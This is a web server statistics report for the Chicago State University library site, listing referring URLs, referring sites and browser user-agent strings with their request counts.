4472http://libnext.csu.edu/maps/sitemap.html
3876http://csu.edu/studentinformation/
3765http://csumoodle.remote-learner.net/
3713http://libnext.csu.edu/guides/userguides.html
3441http://libnext.csu.edu/catalogs/
3425http://www.google.com/url
50  http://www.google.com/url?sa=D&q=http://libnext.csu.edu/&usg=AFQjCNFF4lNlVkxMknuqDWdVSSsN5jhGww
32  http://www.google.com/url?sa=t&source=web&cd=75&ved=0CCkQFjAEOEY&url=http://libnext.csu.edu/elearning/documents/MoodleSetUpHandount._Final.pdf&rct=j&q=moodle quick guide&ei=AFrnTJWcFImChQeivMW3DA&usg=AFQjCNHCOMa17ot82Tap4dsuerF63N8uxw&cad=rja
13  http://www.google.com/url?sa=D&q=http://www.csu.edu/moodle&usg=AFQjCNGg1m-1ZkpIsKZJ1i04V8FKl83V0w
3113http://libnext.csu.edu/cgi-bin/eresources/subject.py
619  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Psychology Databases&subject=psychology
559  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Education Databases&subject=education
425  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Health Sciences Databases&subject=healthsciences
255  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Business Databases&subject=business
172  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Criminal Justice Databases&subject=criminaljustice
131  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Pharmacy Databases&subject=pharmacy
123  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Sociology and Social Work Databases&subject=sociology
119  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=History Databases&subject=history
88  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=News and Current Events Databases&subject=news
82  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Science Databases&subject=science
72  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Literature Databases&subject=literature
67  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=News%2520and%2520Current%2520Events%2520Databases&subject=news
66  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Databases for Children&subject=childeducation
54  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Music Databases&subject=music
51  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Library Science&subject=libraryscience
49  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Physical Education Databases&subject=PhysicalEducation&altsubject=PhysicalEducation
48  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Reference Resources&subject=reference
16  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Mathematics Databases&subject=mathematics
14  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Health%2520Sciences%2520Databases&subject=healthsciences
12  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Health%252520Sciences%252520Databases&subject=healthsciences
2836http://libnext.csu.edu/collections/pincham/art/africa.php
2697http://libnext.csu.edu/cgi-bin/a2z/index.py
120  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=E
101  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=M
96  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=A
91  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=B
90  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=C
75  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=ALL
66  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=S
62  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=P
51  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=N
49  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=L
48  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=D
41  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=J
40  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=W
40  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=F
37  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=G
37  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=R
33  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=I
28  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=T
28  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=H
19  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=V
16  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=U
12  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=K
12  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=O
2486http://libnext.csu.edu/find/
2420http://libnext.csu.edu/ill/
2283http://libnext.csu.edu/guides/
1978http://libnext.csu.edu/is.html
1965http://search.msn.com/results.aspx
267  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=chicago+state+university
169  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=MSNH
51  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=MSNH&srch_type=0
48  http://search.msn.com/results.aspx?q=Chicago+State+University&FORM=MSNH
42  http://search.msn.com/results.aspx?q=Chicago+State+University+Homepage&FORM=QSRE2
41  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=SSRE
36  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=Chicago+State+University
35  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=DNSERR
31  http://search.msn.com/results.aspx?q=myaccount+unit&FORM=USNO
31  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=chicago+state
27  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=chicago+state+university+home+page
27  http://search.msn.com/results.aspx?srch=105&FORM=IE7RE&q=chicago+state+univerisity
25  http://search.msn.com/results.aspx?q=chicago+state+university+home+page&FORM=MSNH
23  http://search.msn.com/results.aspx?q=chicago+state+university+library&FORM=MSNH
22  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=SSRE2
21  http://search.msn.com/results.aspx?q=CHICAGO+STATE+UNIVERSITY&FORM=MSNH
21  http://search.msn.com/results.aspx?q=chicago+state+university&Form=MSNH
20  http://search.msn.com/results.aspx?q=csu.edu&FORM=MSNH&srch_type=0
19  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=chicago+state+university+library
16  http://search.msn.com/results.aspx?q=chicago+State+University&FORM=MSNH
14  http://search.msn.com/results.aspx?q=chicago+state+university&FORM=QBRE
13  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=chicago+state+home+page
13  http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=CHICAGO+STATE+UNIVERSITY
12  http://search.msn.com/results.aspx?q=chicago+state+university+home+page&FORM=SSRE2
10  http://search.msn.com/results.aspx?q=chicago+state+university&form=QBRE
1755http://libnext.csu.edu/units/
1622http://libnext.csu.edu/guides/courseguides.html
1622http://libnext.csu.edu/finding/databases/
1602http://libnext.csu.edu/forstudents/
1530http://webs.csu.edu/~wgraham/bookmarks.html
1445http://libnext.csu.edu/news/
1442http://libnext.csu.edu/finding/articles/
1363http://libnext.csu.edu/lisps/ris/
1338http://libnext.csu.edu/hours/
1319http://libnext.csu.edu/organization/
1298http://libnext.csu.edu/lisas/positions/index.html
1257http://www.csu.edu/results.htm
90  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=library
77  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=Search+CSU&sa=Go
59  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=library&sa=Go
16  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=DESIGNER
15  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=bookstore&sa=Go
12  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=&sa=Go
12  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=bookstore
11  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=csu+library+database&sa=Go
10  http://www.csu.edu/results.htm?cref=http://www.csu.edu/cref_cse.xml&cof=FORID:9&q=Library
1236http://libnext.csu.edu/lisps/circulation/index.html
1197http://www.bing.com/search
22  http://www.bing.com/search?q=chicago+state+university&src=IE-SearchBox&FORM=IE8SRC
19  http://www.bing.com/search?q=chicago+state+university+home+page&form=DLCMHP&qs=AS
18  http://www.bing.com/search?q=chicago+state+university+home+page&form=MSNH14&qs=AS
16  http://www.bing.com/search?q=csu.edu&mkt=en-us&FORM=DLCTBR&DI=6244&CE=14.0&CM=SearchWeb
12  http://www.bing.com/search?q=csu.edu&form=DLCMHP&qs=n&pc=MDDC
12  http://www.bing.com/search?q=csu.edu&src=IE-SearchBox&Form=IE8SRC
12  http://www.bing.com/search?q=Chicago+State+University+Home+Page&FORM=R5FD
11  http://www.bing.com/search?q=chicago+state+university+library&src=IE-SearchBox&FORM=IE8SRC
10  http://www.bing.com/search?q=csu.edu&mkt=en-us&FORM=DLRTBR&DI=6244&CE=14.0&CM=SearchWeb
10  http://www.bing.com/search?q=chicago+state+university+home+page&form=DLCMHP&qs=AS&adlt=strict
1181http://libnext.csu.edu/friends/foundationinfo.html
1162http://libnext.csu.edu/texthome.html
1161http://libnext.csu.edu/ilbc/
1129http://libnext.csu.edu/guides/subjects/index.html
1126http://libnext.csu.edu/using/databases/
1103http://libnext.csu.edu/maps/
1086http://libnext.csu.edu/digitallibraries/csuhistory/index.html
1074http://libweb.csu.edu/ill/
1068http://libnext.csu.edu/organization/charts_files/widgets.html
1064http://libnext.csu.edu/cgi-bin/equipmentrequest/insert.py
1019http://libnext.csu.edu/tlr/
1002http://libnext.csu.edu/helpcenter/
973http://libnext.csu.edu/finding/qlinks.html
935http://search.live.com/results.aspx
44  http://search.live.com/results.aspx?srch=106&FORM=AS6&q=chicago+state+university
32  http://search.live.com/results.aspx?q=Chicago+State+University+Homepage&FORM=QSRE2
31  http://search.live.com/results.aspx?srch=105&FORM=IE7RE&q=chicago+state+univerisity
29  http://search.live.com/results.aspx?srch=105&FORM=AS5&q=chicago+state+university
17  http://search.live.com/results.aspx?srch=105&FORM=IE7RE&q=chicago+state+university+home+page
17  http://search.live.com/results.aspx?srch=105&FORM=IE7RE&q=chicago+state+university
14  http://search.live.com/results.aspx?q=chicago+state+university&form=QBRE
12  http://search.live.com/results.aspx?FORM=DNSAS&q=www.chicagostateuniversity.edu
10  http://search.live.com/results.aspx?q=Chicago+State+University&FORM=QSNO
10  http://search.live.com/results.aspx?q=chicago+state+university&FORM=SSRE2
934http://libnext.csu.edu/ASRS/index.html
921http://libnext.csu.edu/ILBC/photographs.html
914http://www.csu.edu/facultyinformation/
911http://libnext.csu.edu/lisps/govinfo/
898http://libnext.csu.edu/eresources/remoteaccess.html
875http://www.csu.edu/GraduateSchool/
869http://libnext.csu.edu/schedules/index.php
865http://csu.edu/locator/AtoZ.html
862http://libnext.csu.edu/lisps/access/specialservices/ill.html
840http://libnext.csu.edu/cgi-bin/eresources/reference.py
831http://libnext.csu.edu/~staffdev/
18  http://libnext.csu.edu/~staffdev/?
810http://libnext.csu.edu/policies/
802http://www.libraryjobpostings.org/indivlib.htm
795http://libnext.csu.edu/schedules/
794http://libnext.csu.edu/services/
785http://lists.webjunction.org/libweb/Academic_IL.html
780http://libnext.csu.edu/os.html
780http://www.csu.edu/academicinformation/
774http://libnext.csu.edu/organization/charts_files/main_2.html
758http://libnext.csu.edu/index.html
754http://libnext.csu.edu/aboutus/
743http://libnext.csu.edu/finding/databases/subjects/index.html
689http://libnext.csu.edu/organization/index.html
675http://libnext.csu.edu/lisps/access/ill/
659http://libnext.csu.edu/lisas/
647http://search.yahoo.com/bin/search
233  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=chicago state university
97  http://search.yahoo.com/bin/search?p=chicago state university
73  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=cHICAGO sTATE university
28  http://search.yahoo.com/bin/search?p=Chicago State University
19  http://search.yahoo.com/bin/search?p=www.csu.edu
18  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=Chicago State University
15  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=www.csu.edu
15  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=Chicago state university
15  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=csu.edu
12  http://search.yahoo.com/bin/search?fr=ybr_sbc&p=csu library
646http://libnext.csu.edu/units/orgchart.html
636http://libnext.csu.edu/collections/pincham/
635http://libnext.csu.edu/csuebooks/
23  http://libnext.csu.edu/csuebooks/?textonly=true
623http://libnext.csu.edu/departments/LISMS/mediaservices/
623http://libnext.csu.edu/articles/index.php
621http://libnext.csu.edu/organization/charts_files/png_1.html
617http://libnext.csu.edu/pap/
604http://www.csu.edu/studentinformation/currentstudents.htm
603http://libnext.csu.edu/acquisitions/
567http://libnext.csu.edu/lisasc/
559http://goarticles.com/article/Install-Windows-Driver/3203810
551http://libnext.csu.edu/lisps/
531http://libnext.csu.edu/vision/
529http://libnext.csu.edu/lisps/erc/
520http://libnext.csu.edu/csit/module1/side_nav.htm
518http://libnext.csu.edu/asc/
507http://libnext.csu.edu/tlr/mediaservices/
506http://libnext.csu.edu/digitallibraries/
497http://libnext.csu.edu/databases/
494http://libnext.csu.edu/tutorials/
493http://libnext.csu.edu/news/MeekerDescription.html
486http://www.google.co.in/search
478http://libnext.csu.edu/cgi-bin/equipmentrequest/index.py
473http://libnext.csu.edu/csit/module1/sources.htm
454http://libnext.csu.edu/directory/index.php
24  http://libnext.csu.edu/directory/index.php?letter=A
20  http://libnext.csu.edu/directory/index.php?letter=D
18  http://libnext.csu.edu/directory/index.php?letter=ALL
12  http://libnext.csu.edu/directory/index.php?letter=H
12  http://libnext.csu.edu/directory/index.php?letter=M
11  http://libnext.csu.edu/directory/index.php?letter=S
10  http://libnext.csu.edu/directory/index.php?letter=T
10  http://libnext.csu.edu/directory/index.php?letter=C
448http://www.google.co.uk/search
28  http://www.google.co.uk/search?hl=en&q=how+to+use+databases&meta=
448http://libnext.csu.edu/lists/
445http://libnext.csu.edu/csit/
436http://www.carli.illinois.edu/mem-libs/mems_indiv.php
436  http://www.carli.illinois.edu/mem-libs/mems_indiv.php?member_id=13
435http://libweb.csu.edu/maps/sitemap.html
433http://libnext.csu.edu/internet/index.html
430http://libnext.csu.edu/ps.html
423http://www.csu.edu/administrativeinformation/
419http://libnext.csu.edu/lisps/access/reserves/
418http://libnext.csu.edu/lisars/
417http://libnext.csu.edu/finding/journals/
414http://libnext.csu.edu/helpcenter/desks/index.html
413http://www.google.ca/search
412http://libnext.csu.edu/guides/callnumber.html
410http://libprod.csu.edu/cgi-bin/directory/index.py
24  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=C
23  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=D
20  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=H
20  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=M
17  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=B
17  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=O
16  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=A
16  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=G
16  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=J
15  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=F
15  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=L
15  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=P
15  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=T
15  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=W
14  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=E
14  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=K
14  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=R
14  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=S
12  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=I
10  http://libprod.csu.edu/cgi-bin/directory/index.py?letter=N
405http://search.comcast.net/
46  http://search.comcast.net/?cat=Web&con=homepage&q=csu.edu+library
41  http://search.comcast.net/?cat=web&con=homepage&q=csu.edu+library
32  http://search.comcast.net/?cat=web&con=homepage&form_submit=1&q=csu.edu+library
19  http://search.comcast.net/?cat=web&con=homepage&form_submit=1&q=csu.edu+library&top_SearchSubmit=
17  http://search.comcast.net/?q=chicago+state+university&cat=Web&con=betaa
11  http://search.comcast.net/?q=csu.edu&cat=Web&con=betaa
10  http://search.comcast.net/?q=chicago+state+university&cat=Web&con=net
403http://libnext.csu.edu/eresources/webfeat.php
398http://libstaff.csu.edu/
397http://libnext.csu.edu/cr/
395http://libnext.csu.edu/ask/
395http://libnext.csu.edu/finding/books/
382http://www.ask.com/web
12  http://www.ask.com/web?q=chicago+state+university&qsrc=0&o=0
11  http://www.ask.com/web?l=dis&o=15853&qsrc=2870&gct=dns&gc=1&q=www.csu.edu
380http://libnext.csu.edu/guides/researchingtopics.htm
379http://libprod.csu.edu/cgi-bin/eresources/eselect.py
375  http://libprod.csu.edu/cgi-bin/eresources/eselect.py?title=All Databases
379http://libnext.csu.edu/tlr/mediaproductions/
376http://libnext.csu.edu/scheduling/
374http://libnext.csu.edu/lisps/circulation/
365http://libnext.csu.edu/lisps/myaccount.html
345http://libnext.csu.edu/catalogs/index.php
340http://images.google.com/imgres
339http://aolsearch.aol.com/aol/search
58  http://aolsearch.aol.com/aol/search?encquery=4d316ac476cbcfc93f37d7f67c135d550ce489209b9d9607&invocationType=keyword_rollover&ie=UTF-8
26  http://aolsearch.aol.com/aol/search?encquery=86a65cbddd908b6e2b2151abeca44dff0ce489209b9d9607&invocationType=keyword_rollover&ie=UTF-8
12  http://aolsearch.aol.com/aol/search?invocationType=wscreen-searchboxhtml&query=chicago state university
11  http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=chicago+state+university
336http://libnext.csu.edu/csit/nf/intro/misconceptions.htm
333http://www.csu.edu/library/
333http://libnext.csu.edu/helpcenter/desks/
327http://libnext.csu.edu/digitallibraries/csuhistory/
325http://www.csu.edu/facultyinformation/index.htm
325http://libnext.csu.edu/acquisitions/development.html
322http://libnext.csu.edu/lisps/access/ill/desk.html
321http://www.google.com/imgres
312http://libnext.csu.edu/friends/
306http://libnext.csu.edu/organization/charts.html
305http://www.csu.edu/gateway/visitors.htm
301http://libnext.csu.edu/finding/articles/index.php
301http://libnext.csu.edu/csit/module2/side_nav.htm
299http://wfxsearch.webfeat.org/cgi-bin/WebFeat.dll
299http://libnext.csu.edu/is/
299http://libnext.csu.edu/lisps/access/specialservices/reserves/faculty.html
297http://libnext.csu.edu/csit/intro/require.htm
297http://libweb.csu.edu/digitallibraries/
296http://libnext.csu.edu/csit/intro/issues.htm
296http://libprod.csu.edu/ill/
296http://libnext.csu.edu/csit/nf/intro/selector.html
295http://www.csu.edu/IVC/
294http://libweb.csu.edu/directory/index.html
293http://www.csu.edu/provost/faculty.htm
286http://libnext.csu.edu/using/journals/
285http://libnext.csu.edu/news/junecatalog.html
284http://libnext.csu.edu/ILBC/
281http://libweb.csu.edu/lisps/access/reserves/
278http://libnext.csu.edu/~tour/
277http://libnext.csu.edu/tlr/mediaproductions/eventtaping.html
273http://libnext.csu.edu/lisps/access/
272http://libnext.csu.edu/cr/index.html
269http://libnext.csu.edu/copyright/
267http://libnext.csu.edu/request/instruction/
258http://libnext.csu.edu/mission/
251http://libnext.csu.edu/collections/pincham/art/country.php
35  http://libnext.csu.edu/collections/pincham/art/country.php?country=Zimbabwe
16  http://libnext.csu.edu/collections/pincham/art/country.php?country=Ghana
73507[not listed: 8,263 URLs]

Referring Site Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists which servers people followed links from.

Listing referring sites with at least 250 requests, sorted by the number of requests.

reqssite
723243http://libnext.csu.edu/
250632http://www.csu.edu/
27065http://www.google.com/
15422http://csu.edu/
7955http://search.yahoo.com/
6654http://libweb.csu.edu/
6113http://csuonline.blackboard.com/
3953http://csumoodle.remote-learner.net/
3675http://libprod.csu.edu/
2245http://search.msn.com/
1659http://webs.csu.edu/
1216http://www.bing.com/
1157http://my-crazylife.com/
1018http://search.live.com/
844http://lists.webjunction.org/
803http://www.libraryjobpostings.org/
660http://web.ebscohost.com.bluestem.csu.edu:2048/
643http://www.carli.illinois.edu/
633http://libstaff.csu.edu/
599http://www.google.co.in/
561http://goarticles.com/
554http://web.ebscohost.com/
535http://wfxsearch.webfeat.org/
514http://www.google.co.uk/
503http://csu.libguides.com/
492http://www.google.ca/
455http://search.comcast.net/
383http://www.ask.com/
371http://libnext.csu.edu/
344http://images.google.com/
342http://aolsearch.aol.com/
285http://www.google.com.au/
277http://about.jstor.org/
19402[not listed: 3,314 sites]

Browser Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the browsers used by visitors.

Listing browsers with at least 250 requests, sorted by the number of requests.

reqspagesbrowser
143017140433Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
119713109964Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
108937108186Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
9873789911Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
9835096664Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
6937467973Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)
5859557671Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
3924638850Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
3846437737Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
3778835955msnbot/1.0 (+http://search.msn.com/msnbot.htm)
3033225992Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
2310922625Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2090920831Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
1945819399Baiduspider+(+http://www.baidu.com/search/spider.htm)
1848916546msnbot/1.1 (+http://search.msn.com/msnbot.htm)
1751117469Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
1688816436Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
1681916310Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
1564913486msnbot/2.0b (+http://search.msn.com/msnbot.htm)
1555915272Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
1540815053Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
1415613575Googlebot/2.1 (+http://www.google.com/bot.html)
1351313466Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR)
1280411690FAST Enterprise Crawler 6 / Scirus scirus-crawler@fast.no; http://www.scirus.com/srsapp/contactus/
1274212712Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
1158911267Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
1151411429msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)
1129110844noxtrumbot/1.0 (crawler@noxtrum.com)
97239707Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
93568202Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
88377580Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
86808557Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
86298496Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
83758273Java/1.4.1_04
81188109msnbot/0.9 (+http://search.msn.com/msnbot.htm)
76297611Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
75617510Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
61135958Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
60586042Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
60195999Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
59785968Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)
59535925Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
58245034Yandex/1.01.001 (compatible; Win16; I)
54635196Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
53365260Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
53125244Java/1.5.0_06
51725147Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322)
51404798Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; InfoPath.2)
50044922Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
49934993Baiduspider+(+http://www.baidu.com/search/spider_jp.html)
49404940Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)
46564602Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)
45294328Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
44004384Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
43954084Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
43193242Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
43174131Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
43094117Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)
42544128Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
